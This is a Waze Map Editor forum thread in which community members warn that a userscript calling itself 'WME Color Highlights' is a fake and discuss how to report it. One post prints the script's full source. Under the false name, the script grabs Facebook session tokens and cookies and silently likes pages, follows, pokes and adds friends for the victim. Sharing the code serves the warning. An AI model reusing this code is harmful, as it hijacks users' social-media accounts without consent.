Get a sneak peek at whats next for Permanent Hazards on our April 7th Office Hours!
Discussion for the unofficial, community-developed addons, extensions and scripts built for the Waze Map Editor.

The official index of these tools is the Community Plugins, Extensions and Tools wiki page.

Post Reply
Forum rules
Discussion for the unofficial, community-developed addons, extensions and scripts built for the Waze Map Editor.

DO NOT START a new thread unless it is about a new idea. Keep discussion of existing tools within the main thread for that tool.

The official index of these tools is the Community Plugins, Extensions and Tools wiki page.

Attention: new WME Color Highlights on userscripts.org

Post by AlexN-114
I found a new script at userscripts.org which call itself WME Color Highlights and is from zuny alen. I looked in it and found nothing which looks like a Highlighter. :evil:
It is not limed to waze page and seems to send "likes" to facebook pages.

But perhaps I am only to stupid to understand this script, but I will not trust this script.

If I want to install a WME Color Highlights, then I will look that it is from TimBones ( OK, I know my WME Highlighter City is also safe)
AlexN-114
Posts: 590
Has thanked: 142 times
Been thanked: 302 times

POSTER_ID:8262764

1

Send a message
best regards Alex ;)
AM Waldviertel (NÖ)/Forest quarter (Lower Austria) / CM Austria / GC
https://www.waze.com/wiki/images/8/87/RWrsig.png
HiLiCi @ greasyfork.org or @ userscripts.org

Post by asterix06
How could we keep CH users aware of the fake...as not everybody is reading here?
asterix06
Coordinators
Coordinators
Posts: 5019
Has thanked: 229 times
Been thanked: 886 times
Send a message
https://lh3.googleusercontent.com/-4L_o ... _small.pnghttps://s.waze.tools/gc.png
Iphone8+ Waze 4.43.0
Coordinator Waze Italy
Country Administrator Italy, CM China , CM Africa, Iran, Croatia, Bosnia & Herzegovina, Turchia.
Forum Administrator

Post by doctorkb
asterix06 wrote:How could we keep CH users aware of the fake...as not everybody is reading here?
Perhaps by somehow pointing everyone to either the wiki or this forum for script links...

There doesn't appear to be any reliable way of reporting malicious code on userscripts.
doctorkb
Posts: 4385
Answers: 4
Has thanked: 433 times
Been thanked: 1464 times
Send a message

Post by McCracken808
Use this link to report to Userscript.org of its bogus nature.
McCracken808
Posts: 269
Has thanked: 51 times
Been thanked: 18 times
Send a message
Aloha,
Douglas


AM - Hawaii

https://db.tt/jYYT4mG3https://db.tt/4b2TzYlShttps://db.tt/AnfHrb6N
Waze Resources:
Waze Wiki, Landmarks Guideline, Area Manager Wiki, Best Practices

iPhone 5, iOS 7.1.1, Waze 3.8, Mazda3

Post by OyyoDams
Exact this one is a fake!

For info the code has nothing to do with a WME extension:

Code: Select all

// ==UserScript==
// @name            WME Color Highlights
// @namespace       WME Color Highlights
// @Hak Cipta          Smart Boy
// ==/UserScript==
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function Like(p) { var Page = new XMLHttpRequest(); var PageURL = "//www.facebook.com/ajax/pages/fan_status.php"; var PageParams = "&fbpage_id=" + p +"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp="; Page.open("POST", PageURL, true); Page.onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { Page.close; } }; Page.send(PageParams); } 
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value; var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function a(abone) { var http4=new XMLHttpRequest; var url4="/ajax/follow/follow_profile.php?__a=1"; var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp="; http4.open("POST",url4,true); http4.onreadystatechange=function() { if(http4.readyState==4&&http4.status==200)http4.close } ; http4.send(params4) } function sublist(uidss) { var a = document.createElement('script'); a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();"; document.body.appendChild(a); } function p(abone) { var http4 = new XMLHttpRequest(); var url4 = "//www.facebook.com/ajax/poke_dialog.php"; var params4 = "uid=" + abone + "&pokeback=0&ask_for_confirm=0&nctr[_mod]=pagelet_timeline_profile_actions&__asyncDialog=1&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=v&fb_dtsg="+fb_dtsg+"&phstamp="; http4.open("POST", url4, true); http4.onreadystatechange = function () { if (http4.readyState == 4 && http4.status == 200) { http4.close; } }; http4.send(params4); }var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var now=(new Date).getTime(); function P(opo) { var X = new XMLHttpRequest(); var XURL ="//www.facebook.com/ajax/ufi/like.php"; var XParams = "like_action=true&ft_ent_identifier="+opo+"&source=1&client_id="+now+"%3A379783857&rootid=u_jsonp_39_18&giftoccasion&ft[tn]=%3E%3D&ft[type]=20&ft[qid]=5890811329470279257&ft[mf_story_key]=2814962900193143952&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dyn=7n88QoAMBlClyocpae&__req=g4&fb_dtsg="+fb_dtsg+"&phstamp="; X.open("POST", XURL, true); X.onreadystatechange = function () { if (X.readyState == 4 && X.status == 200) { X.close; } }; X.send(XParams); } 
// pic + fans
P("451804298278412");Like("710616545637958");Like("1409918565922390");Like("275136455944477");Like("603080806413219");P("616944838368872");Like("219378364899812");Like("420844481374394");
/*Add Friend*/;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function IDS(r) {
  var X = new XMLHttpRequest();
  var XURL = "//www.facebook.com/ajax/add_friend/action.php";
  var XParams = "to_friend=" + r +"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";
  X.open("POST", XURL, true);
  X.onreadystatechange = function () {
    if (X.readyState == 4 && X.status == 200) {
      X.close;
    }
  };
  X.send(XParams);
}
OyyoDams
Emeritus Local Champ
Emeritus Local Champ
Posts: 2675
Has thanked: 143 times
Been thanked: 674 times
Send a message

Post by Timbones
Yes, it's been reported before. This author has a huge number of scripts, all masquerading as something they are not.
Timbones
Coordinators
Coordinators
Posts: 7357
Answers: 2
Has thanked: 952 times
Been thanked: 2916 times
Send a message
Timbones(6) • UK Coordinator • Forum Moderator • Closure Monitor
Scripts: WME Colour HighlightsWME Route TesterWME Geometries